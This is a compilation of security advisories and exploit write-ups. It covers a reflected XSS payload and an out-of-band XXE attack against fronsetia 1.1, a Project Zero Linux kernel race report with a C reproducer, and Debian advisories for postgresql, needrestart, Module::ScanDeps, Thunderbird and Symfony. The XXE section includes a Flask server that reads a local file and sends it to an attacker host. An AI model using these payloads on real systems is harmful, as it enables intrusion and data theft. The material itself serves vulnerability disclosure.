fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

fronsetia 1.1 Cross Site Scripting

fronsetia version 1.1 suffers from an XML external entity injection vulnerability.

    # Exploit Title: XXE OOB - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.htmlXXE OOBDescription:- It was found that the application was vulnerable XXE (XML External EntityInjection)Steps to Reproduce:1. Add Python3 server to serve malicious XXE payload2. Add a file on the file system to be read via the application XXE payloadecho 123123 > /tmp/1233. Enter the following URL as inputhttp://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl// Python Server Codefrom flask import Flask, Response, requestimport loggingapp = Flask(__name__)# Set up logginglogging.basicConfig(level=logging.DEBUG)@app.route('/testxxeService', defaults={'path': ''})def catch_all(path):    app.logger.debug("Serving XXE payload")    xml = """<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;]><data>&send;</data>"""    return Response(xml, mimetype='text/xml', status=200)@app.route('/data.dtd', defaults={'path': ''})def hello(path):    app.logger.debug("DTD requested")    xml = """<!ENTITY % file SYSTEM "file:///tmp/123"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">%eval;%exfil;"""    return Response(xml, mimetype='text/xml', status=200)if __name__ == "__main__":    app.run(host='0.0.0.0', port=10000)

fronsetia 1.1 XML Injection

A security-relevant race between mremap() and THP code has been discovered. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.

    SummaryI found a security-relevant race between mremap() and THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I'm pretty sure they're not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you're curious, but I think they're stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.I will send a suggested patch for the security bug, but I think it's unclear if my patch is actually the right way to fix it.This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlSecurity bug: move_normal_pmd vs MADVISE_COLLAPSEDescriptionIn mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, ...) is called, which first takes rmap locks, then does move_normal_pmd().move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:        /* Clear the pmd */        pmd = *old_pmd;        pmd_clear(old_pmd);        VM_BUG_ON(!pmd_none(*new_pmd));        pmd_populate(mm, new_pmd, pmd_pgtable(pmd));        flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);The problem is: The rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same tmpfs file that is stored on a tmpfs mount with huge=advise):process A                      process B=========                      =========mremap  mremap_to    move_vma      move_page_tables        get_old_pmd        alloc_new_pmd                      *** PREEMPT ***                               madvise(MADV_COLLAPSE)                                 do_madvise                                   madvise_walk_vmas                                     madvise_vma_behavior                                       madvise_collapse                                         hpage_collapse_scan_file                                           collapse_file                                             retract_page_tables                                               i_mmap_lock_read(mapping)                                               pmdp_collapse_flush                                               i_mmap_unlock_read(mapping)        move_pgt_entry(NORMAL_PMD, ...)          take_rmap_locks          move_normal_pmd          drop_rmap_locksIn this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:pmd_populate(mm, new_pmd, pmd_pgtable(pmd));runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the X86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address - so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.So this ends up installing physical address 0 as a page table.Fixing itI guess there are two ways we could fix this:    Hold the rmap locks much more broadly in move_page_tables(). In particular, take them before inspecting the source pmd, and if we do a PMD-level move, keep them held throughout the entire move.    Add a bunch of extra recheck/retry logic.I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.I will send a suggested patch for the first option in a minute (and I have tested that with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding of whether this is the right way to patch it, and if yes, whether the patch is doing too little lock-dropping for performance or adds too much complexity with the lock-dropping...ReproducerI made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:#define _GNU_SOURCE#include <err.h>#include <sched.h>#include <stdio.h>#include <string.h>#include <fcntl.h>#include <signal.h>#include <stdlib.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/stat.h>#include <sys/prctl.h>#include <sys/mount.h>#include <sys/mman.h>#include <sys/wait.h>#include <sys/ioctl.h>static void pin_to(int cpu) {  cpu_set_t cset;  CPU_ZERO(&cset);  CPU_SET(cpu, &cset);  if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))    err(1, "set affinity");}#ifndef MADV_COLLAPSE#define MADV_COLLAPSE 25#endif#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})static void write_file(char *name, char *buf) {  int fd = SYSCHK(open(name, O_WRONLY));  if (write(fd, buf, strlen(buf)) != strlen(buf))    err(1, "write %s", name);  close(fd);}static void write_map(char *name, int outer_id) {  char buf[100];  sprintf(buf, "0 %d 1", outer_id);  write_file(name, buf);}int main(void) {  // set up new mount ns for tmpfs with THP  int outer_uid = getuid();  int outer_gid = getgid();  SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));  write_file("/proc/self/setgroups", "deny");  write_map("/proc/self/uid_map", outer_uid);  write_map("/proc/self/gid_map", outer_gid);  // make tmpfs with THP  SYSCHK(mount("none", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "huge=advise"));  pin_to(0);  while (1) {    int fd = SYSCHK(open("/tmp/a", O_RDWR|O_CREAT, 0600));    void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));    SYSCHK(ftruncate(fd, 0x1000));    *((volatile char *)ptr) = 'a';    SYSCHK(ftruncate(fd, 0x200000));    SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));    close(fd);    SYSCHK(unlink("/tmp/a"));    int child = SYSCHK(fork());    if (child == 0) {      for (int i=0; i<512; i++)        ((volatile char *)ptr)[0x1000*i] = 'a';      struct sched_param param = { .sched_priority = 0 };      SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));      /* race (outer side, will be preempted) */      SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));      return 0;    }    for (int i=0; i<512; i++)      ((volatile char *)ptr)[0x1000*i] = 'a';    usleep(10);    /* race (inner side, will preempt after timer and voluntary resched) */    int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);    if (madv_res == -1)      fprintf(stderr, "_");    int wstatus;    SYSCHK(waitpid(child, &wstatus, 0));    SYSCHK(munmap(ptr, 0x200000));    fprintf(stderr, ".");  }}Usage:user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.cuser@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist.................................................................................................................................Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):[  120.427189] BUG: Bad page map in process collapse-vs-mre  pte:f000ff53f000ff53 pmd:00000067[  120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0[  120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0[  120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G        W          6.11.0 #493[  120.433591] Tainted: [W]=WARN[  120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014[  120.435849] Call Trace:[  120.436375]  <TASK>[  120.436843]  dump_stack_lvl+0x53/0x70[  120.437570]  print_bad_pte+0x4e6/0x8e0[...][  120.447625]  vm_normal_page+0x1c8/0x260[...][  120.450162]  unmap_page_range+0x914/0x3d10[...][  120.456954]  unmap_vmas+0x1cc/0x390[...][  120.461123]  exit_mmap+0x160/0x6c0[...][  120.465181]  mmput+0xa0/0x3a0[  120.465793]  do_exit+0x7cd/0x27f0[...][  120.472198]  do_group_exit+0xac/0x230[  120.472916]  __x64_sys_exit_group+0x3e/0x50[  120.473722]  x64_sys_call+0x17f3/0x1800[  120.474469]  do_syscall_64+0x4b/0x110[  120.475189]  entry_SYSCALL_64_after_hwframe+0x76/0x7e[...][  120.489560]  </TASK>On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm's pagetable bytes counter being -4096 on process exit.ImpactReaching this bug requires that you can create shmem/file THP mappings - anonymous THP uses different code that doesn't zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they're not affected.)As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.At that point, I think several bad things can happen that could lead to privilege escalation, though I haven't tested that:    When a PTE is zapped through the page table's first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.    If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and then munmap() VMA 1, you'll end up with an anonymous page that's only mapped into a VMA that is not associated with the page's anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 - but that seems to be the case at least on the two X86 systems I tested this on.Non-issue 2 (no impact): move_ptes vs MADVISE_COLLAPSEmove_ptes() locks the source and destination page tables as follows:        old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);        if (!old_pte)                return -EAGAIN;        new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);        if (!new_pte) {                pte_unmap_unlock(old_pte, old_ptl);                return -EAGAIN;        }        if (new_ptl != old_ptl)                spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_orderThe classic way mremap() used to work is:    We make a new VMA.    We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.    If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.As a comment in move_page_tables() explains:/* * On error, move entries back from new area to old, * which will succeed since page tables still there, * and then proceed to unmap new area instead of old. */However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):    move_vma() calls move_page_tables()    move_page_tables() moves an anonymous huge PMD entry.    move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.    Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).    move_vma() calls move_page_tables() in the reverse direction to move PTEs back.    move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.    do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn't lead to any major consequences.FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, ...), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.CommentsAll commentsja...@google.com <ja...@google.com> #2Oct 15, 2024 11:05AMThe fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.ja...@google.com <ja...@google.com> #3Oct 22, 2024 09:28AMMarked as fixed, reassigned to ja...@google.com.Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa ("mm/mremap: fix move_normal_pmd/retract_page_tables race").In stable releases:    6.6.58 (2024-10-22)    6.11.5 (2024-10-22)Related CVE Number: CVE-2024-50066.Credit: Jann Horn

Linux 6.6 Race Condition

Debian Linux Security Advisory 5812-2 - The postgresql minor release shipped in DSA 5812 introduced an ABI break, which has been reverted so that extensions do not need to be rebuilt.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5812-2                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 21, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-15The postgresql minor release shipped in DSA 5812 introduced an ABI break,which has been reverted so that extensions do not need to be rebuilt.For the stable distribution (bookworm), this  has been fixed inversion 15.10-0+deb12u1.We recommend that you upgrade your postgresql-15 packages.For the detailed security status of postgresql-15 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-15Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmc/hswACgkQEMKTtsN8TjZePRAAgnIkPa8sI7Rv38Ye9PxPsElOYO5pMMe4Pn8xcqtVtDdYsu/D2n/H7lF5u7Yn3WAjSLYbTi2wc9sPZ2lqg/qgEgGuU0xh4+Bbd2N0eXSWRZMCe9ILIJqdyX0BeF3hjpqmJrkOi1xxIxsvS8nLxXdI4zEJdCd9R+Q2iH8D0Xl3IuRWPFYpOdu4aWSgtqlYrmRtZ6yM/LCM8qnTOf1WZ+L8x7jYHQ21PGYH+645UY3tCEoe4mr3H2e/f0rLVxAJMvFQbbUk/gLVozI4+5cIracmcQMaHR+TqHfkVY8qMq9iASehFF9qhxMJVSP2o0aprYMHyKoIudyzLUuM0fJD0xs2yQjj+wP71mTPe3t4NqBDE4z/oDNgXuehRMmOPeBq3nP7JQG/BhQN/F4bDI3aSu/EPfUwEODiIPapGeYTjnI0RPU6RxgfM1qTLPFAvzFYIyRCPlqmAF/RhFndSnXl2mMsZo/w69CUgKtt04c1nATXGI+VklIV400mHPLFCj+ETF0qESNwGqiUdyxYY2uuTa/KyJ+JzHBTJ9wYEgZErKVdpyVcaB7+0j+Sx15tObwIfhdTths2BOtCl9jp1hLtitwog7486FOVIL4TpXkqk4TfLwD9DiK/KurE/aUlEwDDk9j5F8KA7HqW+e1eAlsqI+P+kHHkSXlVj+DssQRvQywqIN0==pbdM-----END PGP SIGNATURE-----

Debian Security Advisory 5812-2

Debian Linux Security Advisory 5816-1 - The Qualys Threat Research Unit discovered that libmodule-scandeps-perl, a Perl module to recursively scan Perl code for dependencies, allows an attacker to execute arbitrary shell commands via specially crafted file names.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5816-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 19, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libmodule-scandeps-perl  
CVE ID         : CVE-2024-10224

The Qualys Threat Research Unit discovered that libmodule-scandeps-perl,  
a Perl module to recursively scan Perl code for dependencies, allows an  
attacker to execute arbitrary shell commands via specially crafted file  
names.

Details can be found in the Qualys advisory at  
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt

For the stable distribution (bookworm), this problem has been fixed in  
version 1.31-2+deb12u1.

We recommend that you upgrade your libmodule-scandeps-perl packages.

For the detailed security status of libmodule-scandeps-perl please refer  
to its security tracker page at:  
https://security-tracker.debian.org/tracker/libmodule-scandeps-perl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmc8u7tfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Ta0A//TsnJj10BYWU0GlFOs6sGALdSfLn8vxB/E5MM6O4ZSEFC0u8KywvrESTg  
oxh5QieR4kqPDnq5JYIKwBZkD+ohI57ji2xcnjYIp/HRoRXC8IETPvjJHIu5rbtN  
BiMSyvp/9YYGUfOzPDGgqO7Rhuz/GqoFwkvziDXiUOg8OYE4kOUunXuMWBXSOQ6W  
Oji2YHHomRb13QY1DnAx5ISAthBlDeTVLAsReWG6e+dzR6Z+VDRLEHwiXJS9EJSS  
Si4a+KLf5TqJRfI+rSDaRJPRO53I657Xk4Ob5PEc1ay6LfUtdg8zzxyt/FCzlMng  
3mO80A4s2dS4T02L9SeeniSVQFE+etmTQAR3sIoe4AYulgXu5Jz4NrUmNohMdqrq  
xYtIcUD24aig4DRujVMcK5RHndw3JG9/TP5obPeJ5Cjlb28MpeE67e3bgnqzVdN7  
QZLKPoEX0C9LZk+sWqLYx2P1nwiPeaEwYppSFErsZV3w0qnJkTa97LY2XiRTlIWw  
wBjUrHi78bhoGo2Mpo9iGdjN4fcbBolqZ6c/xOWTBmouRWWyD1CblpEZ3UUqnn74  
wUqLknPAdMt8F8C91cKPdXoXkY3nrV01jecj8hfUU3qvDvbu4lyjWmUOP+dYJLUt  
zgJobOMroKkug8sld+eweWF1ILdgCsrQRSUrPYyiP4sAMC6uAKE=  
=+uJR  
-----END PGP SIGNATURE-----

Debian Security Advisory 5816-1

Debian Linux Security Advisory 5815-1 - The Qualys Threat Research Unit discovered several local privilege escalation vulnerabilities in needrestart, a utility to check which daemons need to be restarted after library upgrades. A local attacker can execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable (CVE-2024-48990) or running the Ruby interpreter with an attacker-controlled RUBYLIB environment variable (CVE-2024-48992). Additionally a local attacker can trick needrestart into running a fake Python interpreter (CVE-2024-48991) or cause needrestart to call the Perl module Module::ScanDeps with attacker-controlled files (CVE-2024-11003).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5815-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 19, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : needrestart  
CVE ID         : CVE-2024-11003 CVE-2024-48990 CVE-2024-48991 CVE-2024-48992

The Qualys Threat Research Unit discovered several local privilege  
escalation vulnerabilities in needrestart, a utility to check which  
daemons need to be restarted after library upgrades. A local attacker  
can execute arbitrary code as root by tricking needrestart into running  
the Python interpreter with an attacker-controlled PYTHONPATH  
environment variable (CVE-2024-48990) or running the Ruby interpreter  
with an attacker-controlled RUBYLIB environment variable  
(CVE-2024-48992).  Additionally a local attacker can trick needrestart  
into running a fake Python interpreter (CVE-2024-48991) or cause  
needrestart to call the Perl module Module::ScanDeps with  
attacker-controlled files (CVE-2024-11003).

Details can be found in the Qualys advisory at  
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt

For the stable distribution (bookworm), these problems have been fixed in  
version 3.6-4+deb12u2.

We recommend that you upgrade your needrestart packages.

For the detailed security status of needrestart please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/needrestart

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmc8u7BfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0SWTw//ZZyH3BeNHygAtvD7zi6CEOe6Ni/1fz6RWMiKXmcRFoEPvTb5w7lg7ofj  
TtpZA3Om2ydUnil+XbmaIC9O5/dJ3+oFAtPyUHqI6aIwbr8PDhsJegVh7XW2lw3I  
zou8DQrNVgTLVhYZNJ+q77HqxMYE73opIH7D5YjTY11jgqXIGzFTvuoVFdnmBKCY  
wgdEUaGf0nidS58HnArIxaT2ObGFgtyfxo+mjRYhUDNuJRDe1p2v7DCs8HnZA1XG  
XbVU2ueZkvyAjFi8LwfJA2+ju1CA6JHQUttm/YiJIqXSe204UQdDpFW7fgHOMvGI  
ZawWI1ohzSSVmNck4UxWZ5IxNwbFK2YNAH1XqL8NUTnhFRcUlf1i8eWJn6Tbp2jO  
YZ52CsnVruAmB7o0u3fQE6YJGFtuX9dmO+/qF6/SXrBrqMUVxeoKGFZBGNOH2ppE  
sNB4Dl6yRd6rxaDCSNMSRRSHDNJJxSBSUiyKSmQYziDpciRTgiHDlxzThv8hrCBT  
osH/63F02Ep/gj/QQcbL+FXpD5w6eLk6mJMRnfv+MvqzzEm0DrRA9g8v6r2lTVPT  
hHEFpWuRHEtF1V6PuwMQMqIjWK/XnoTOzylTkerQmsy0oP8BwRtDF652csyDGbSE  
rO17YGPLUCH6fLbgagIUisrzq/tfZmRcIjsUTsYLQgDGidtMccI=  
=Rku5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5815-1

Debian Linux Security Advisory 5814-1 - A security issue was discovered in Thunderbird, which could result in the disclosure of OpenPGP encrypted messages.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5814-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 15, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2024-11159A security issue was discovered in Thunderbird, which could result inthe disclosure of OpenPGP encrypted messages.For the stable distribution (bookworm), this problem has been fixed inversion 1:128.4.3esr-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmc3hfgACgkQEMKTtsN8TjbVvg//ZXOsNtVwdUDIJ7+8IYAPxGAImolFdlNNNOUd7XWu1KOZVoJkV2t7iFl8FgRL830YCuJB5q652SwKXAN1/GnQW0M9qln/R/26+THjwClv+6xASGf7+5g4mcpFPAg7Tg5BM9g3K4yv0xKCtxeGHHsQRcA4sbDZo/a+aZFbMoKJP6nW1x46aGNeyKXnfPJT5sPcyYMN21XTfwa/s097l0NS6cLKd3Kf/kmIhoXaDd1XbWzO5p54i5VLtR4F1vWaEiSOCTQ9tpKigxLjJafZBkeOR2OyF7+APjsQmFcg+Ugx+WF6BzNfy0PVuKFYxDNJMSyxnhiFoJ+DsiXyWUsfSRXcnhD2QgE5XzNNUBM1sOrUZzwbdZrMM80CPjP85AdljasvJMrvx9Nyc3kt0xr7hwLzJSB+GKLbsF6zds2FlePOyzXzs9ZaQJmxr6zDKjF8Li8QrfQpbBDb7xj2YbTKrzqfOSxQgsuW9Pv9C84bmnj/VmxGkDtd2aMzcPkvc5nRCnvaUsP14EDMpQRce0hNvN2Vd8NkegdJzzfE9/K7dnIOCK2P7PjS5gWJ/A3AsEUSuUaSVZmf7wvYBL1w8DFBcqCsdgenV/2oOJ24KoZL7UhIbX2fmpY8qnHlw37gWEIOMYAxcyOxhhY1pbrL4eKnKXTfeH+IeCZhkZ5U7DLm9091jPA==ujGt-----END PGP SIGNATURE-----

Debian Security Advisory 5814-1

Debian Linux Security Advisory 5813-1 - Moritz Rauch discovered that the Symfony PHP framework implemented persisted remember-me cookies incorrectly, which could result in authentication bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5813-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 15, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : symfonyCVE ID         : CVE-2024-51996Moritz Rauch discovered that the Symfony PHP framework implementedpersisted remember-me cookies incorrectly, which could result inauthentication bypass.For the stable distribution (bookworm), this problem has been fixed inversion 5.4.23+dfsg-1+deb12u4.We recommend that you upgrade your symfony packages.For the detailed security status of symfony please refer toits security tracker page at:https://security-tracker.debian.org/tracker/symfonyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmc3hfcACgkQEMKTtsN8TjZZqQ//UwZZ1H2r1s4Dn/wxuq7Wx2Gn9x4Mn2ZeRcmLWf8AEQlOTEUo7GyR539YWqvbTpPiik9kIHF6qOaH9ANSWs0Up/8a3NTueHwrLqOsa1YLm4mMGgAlzO12idwS8+nZLUs16mtlOSKzSdqPxymeVu58QEoKx336pAwkG6ntYnfjo85G/gfrp17UGiKYfcjY7xIMoEC+/LhcLleExtxe7roFfMDtagBxuwJ88/ZdYG0ge7DOfrOvH5Eay3/g2sDo1gxB8texfosV+kFzPIZd7reJMZRuIY4rqvJ31uu85R4yXQSa8mPbm8jFBVsKwyqzuqhKgBlJC3bIoZ6HyoO7bqRqOysr697CrS+jgQ2bqNxEQYwj9Hy3EWezwElT4YxJsFyoq2TpNf2wzAa6WTh2ucA7mAu3KxuddykGjtiPHNU8JwONS2nw1KfGwgrqvz4J9bZZoWaWBQF1RyMA2nFDyc5P13R8LbvLE8eI9uoF/AkHT3AI1Ve7FpmIbqvrPlnpPUTFFn/I+QxrhttRYkZ8KSI48Xrq7XhfpDmirQOhMOeRM+bAo96l9J9xksBle3rP8laI6fUNbDp0C/HSbAYCOvpGt65rPdzlbP8Qg3JcdcBpSyDhxHI7D6Cf6oqqfAHHnjY8ag6ASvoLISu+xshJe1uY48AcbBx8ORaknxJ5bIYi7Zw==ywf6-----END PGP SIGNATURE-----

Debian Security Advisory 5813-1

